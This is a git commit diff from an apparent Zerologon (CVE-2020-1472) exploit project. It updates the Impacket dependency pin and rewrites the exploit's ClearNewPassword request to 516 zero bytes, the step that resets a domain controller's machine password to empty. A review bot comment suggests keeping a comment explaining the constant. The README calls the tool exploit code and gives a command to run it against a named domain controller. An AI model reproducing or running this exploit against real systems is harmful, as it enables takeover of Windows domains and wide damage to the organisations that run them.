Handle the impacket ClearNewPassword changes
parent
b1ad966d60
commit
05ba66e088
|
@ -2,7 +2,7 @@
|
|||
|
||||
Exploit code based on https://www.secura.com/blog/zero-logon and https://github.com/SecuraBV/CVE-2020-1472. Original research and scanner by Secura, modifications by RiskSense Inc.
|
||||
|
||||
To exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3 or newer. Then, do:
|
||||
To exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/b867b21 or newer. Then, do:
|
||||
|
||||
```
|
||||
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
|
||||
|
|
|
@ -4,7 +4,7 @@ cryptography==3.1
|
|||
dnspython==2.0.0
|
||||
Flask==1.1.2
|
||||
future==0.18.2
|
||||
#impacket==0.9.21 # install impacket from https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3
|
||||
#impacket==0.9.21 https://github.com/SecureAuthCorp/impacket/commit/b867b21
|
||||
itsdangerous==1.1.0
|
||||
Jinja2==2.11.2
|
||||
ldap3==2.8
|
||||
|
|
|
@ -90,9 +90,7 @@ def try_zero_authenticate(dc_handle, dc_ip, target_computer):
|
|||
request["Authenticator"] = authenticator
|
||||
#request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
|
||||
#request['ReturnAuthenticator']['Timestamp'] = 0
|
||||
request["ClearNewPassword"] = nrpc.NL_TRUST_PASSWORD()
|
||||
request["ClearNewPassword"]["Buffer"] = b'\x00'*512
|
||||
request["ClearNewPassword"]["Length"] = 0 # It winds up being 516 bytes mentioned in the Secur whitepaper because this is 4 bytes
|
||||
request["ClearNewPassword"] = b"\x00"*516
|
||||
resp = rpc_con.request(request)
|
||||
resp.dump()
|
||||
|
||||
|
|
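Review bot: The new line `request["ClearNewPassword"] = b"\x00"*516` drops the only explanation the hunk had for the constant; the removed lines built an NL_TRUST_PASSWORD with a 512-byte Buffer and a 4-byte Length, and the removed comment is what told a reader why the total is 516 rather than 512. Suggest carrying that over as a trailing comment, e.g. `request["ClearNewPassword"] = b"\x00"*516  # raw NL_TRUST_PASSWORD: 512-byte Buffer + 4-byte Length`, and naming in it that the raw-bytes form is tied to the newer impacket revision this commit targets, since the commit message is the only place that dependency is recorded. The enclosing try_zero_authenticate body continues outside the hunk.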